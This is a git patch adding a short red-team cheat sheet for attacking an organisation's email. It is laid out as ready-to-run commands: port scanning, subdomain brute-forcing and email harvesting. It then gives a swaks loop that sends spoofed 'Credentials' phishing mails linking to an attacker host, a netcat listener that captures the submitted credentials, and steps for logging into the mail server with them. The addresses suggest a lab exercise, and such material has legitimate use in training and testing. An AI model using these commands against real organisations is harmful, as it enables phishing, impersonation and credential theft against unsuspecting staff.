From 94c31a84a8d8708d44b98bd0a2e74ff92929fb28 Mon Sep 17 00:00:00 2001 From: Mehdi Date: Fri, 22 Dec 2023 14:02:20 +0330 Subject: [PATCH] Create Red Team - SMTP.md --- Red Team - SMTP.md | 122 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 122 insertions(+) create mode 100644 Red Team - SMTP.md diff --git a/Red Team - SMTP.md b/Red Team - SMTP.md new file mode 100644 index 0000000..fa551c4 --- /dev/null +++ b/Red Team - SMTP.md @@ -0,0 +1,122 @@ +# Red Team - Attack on SMTP + +1. Information Gathering | `Techniques: Nmap Scanning` +```bash +nmap -sV -sC -v -p- --min-rate=10000 +``` + +2. Subdomain Enumeration | `Techniques: Using ffuf for subdomain Brute-Forcing` +```bash +ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://TargetDomain.com -H "Host: FUZZ.TargetDomain.com" +``` + +3. Email Collection | `Techniques: Extracting Email from Web Page` +```bash +#Manually visit Target Domain / SubDomain and extract emails to mails.txt +``` + +4. Email Engagement | `Techniques: Sending Emails with swaks` +```bash +while read mail; do swaks --to $mail --from support@TargetDomain.com --header "Subject: Credentials" --body "goto http://10.10.14.4" --server 10.10.10.197; done < mails.txt +``` + +5. Credential Harvesting | `Techniques: Netcat Listener` +```bash +nc -lvp 80 # to listen for incoming connections +``` + +6. Accessing SMTP | `Techniques: Using evolution to Access SMTP` +```bash +apt install evolution +#and with Configure SMTP server 10.10.10.197 and email user@TargetDomain.com +``` + +7. Exploring Sent Items | `Techniques: Checking Sent Emails` +```bash +#Check sent items for any useful information afther accessing the SMTP server +``` + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +